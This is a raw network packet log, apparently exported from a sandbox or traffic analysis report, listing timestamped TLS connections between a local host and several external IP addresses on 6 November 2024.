                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821049929 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821103096 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821201086 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821207047 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821459055 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821487904 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821537971 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821544886 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821604013 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821732998 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821784973 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821810961 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821856976 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821861982 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.821904898 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.822196960 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.852097034 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.852102995 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.868088961 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.868098021 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.868976116 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869046926 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869075060 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869102001 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869112968 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869149923 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869155884 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869188070 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869226933 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869460106 CET57702443192.168.2.4104.17.25.14
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.869467974 CET44357702104.17.25.14192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890615940 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890707016 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890750885 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890753984 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890764952 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890800953 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.890806913 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891402006 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891439915 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891448021 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891453981 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891506910 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891541004 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891562939 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891568899 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.891578913 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.914510012 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921380997 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921574116 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921608925 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921619892 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921631098 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921669006 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921670914 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921686888 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.921741009 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922373056 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922681093 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922713995 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922722101 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922728062 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.922760963 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.932085037 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.932090998 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.937938929 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.937999964 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938055038 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938060999 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938322067 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938350916 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938366890 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938371897 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938476086 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938482046 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.938975096 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.939001083 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.939018011 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.939026117 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.939182043 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.980092049 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.994503975 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.994540930 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.994589090 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.994596958 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.995224953 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.995249987 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.995362997 CET44357700172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.995412111 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.995426893 CET57700443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.013729095 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.013819933 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.013873100 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.013880014 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014161110 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014287949 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014293909 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014499903 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014533997 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014545918 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014553070 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014624119 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.014627934 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044594049 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044713020 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044744015 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044761896 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044769049 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.044804096 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045221090 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045593023 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045628071 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045650005 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045655012 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045686007 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045718908 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045721054 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045731068 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045768023 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045773029 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.045806885 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.055223942 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.055335999 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.055660963 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.055706978 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.055711985 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.056159019 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.056207895 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.056214094 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.056267023 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.059102058 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.059106112 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.107084990 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.115607023 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.115673065 CET4434973554.91.146.110192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.115745068 CET49735443192.168.2.454.91.146.110
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137257099 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137270927 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137312889 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137320042 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137357950 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137373924 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137379885 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137398005 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137921095 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137978077 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.137983084 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.138022900 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474526882 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474543095 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474586010 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474598885 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474601984 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474627018 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474632978 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474634886 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474647045 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474658966 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474663019 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474663973 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474673033 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474711895 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474714041 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474716902 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474759102 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474791050 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474812984 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474817991 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474855900 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474863052 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474864960 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.474932909 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475100040 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475106001 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475140095 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475159883 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475159883 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475172997 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475183010 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475186110 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475246906 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475272894 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475292921 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475327969 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475333929 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475357056 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475389957 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475423098 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475452900 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475459099 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475490093 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475568056 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475620031 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475717068 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475728989 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475760937 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475806952 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475806952 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475816011 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475840092 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475850105 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475891113 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475895882 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475940943 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.475943089 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.476089001 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.476181030 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.476421118 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.476435900 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.476700068 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477507114 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477569103 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477601051 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477631092 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477637053 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.477663994 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478225946 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478262901 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478287935 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478295088 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478322983 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478842974 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478861094 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478952885 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.478959084 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479046106 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479509115 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479655981 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479754925 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479762077 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479799032 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479830027 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479832888 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479835033 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.479860067 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480036974 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480145931 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480170965 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480175972 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480179071 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480207920 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480218887 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480232954 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480232954 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480240107 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480252028 CET44357708162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480261087 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480355024 CET57708443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480511904 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480530977 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480576992 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.480853081 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.481698990 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.481717110 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.481870890 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.482441902 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.482511997 CET44357711162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.482671022 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483037949 CET57711443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483050108 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483134985 CET44357717162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483238935 CET57717443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483552933 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.483582973 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.484726906 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.484769106 CET57718443192.168.2.4172.217.16.196
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.484778881 CET44357718172.217.16.196192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.485244989 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.485451937 CET44357710162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.485488892 CET57710443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.507071018 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.507247925 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.507443905 CET44357697162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.507602930 CET57697443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.522002935 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.522871017 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523015022 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523124933 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523220062 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523278952 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523374081 CET57699443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.523895025 CET44357699162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.524174929 CET57699443192.168.2.4162.159.140.34
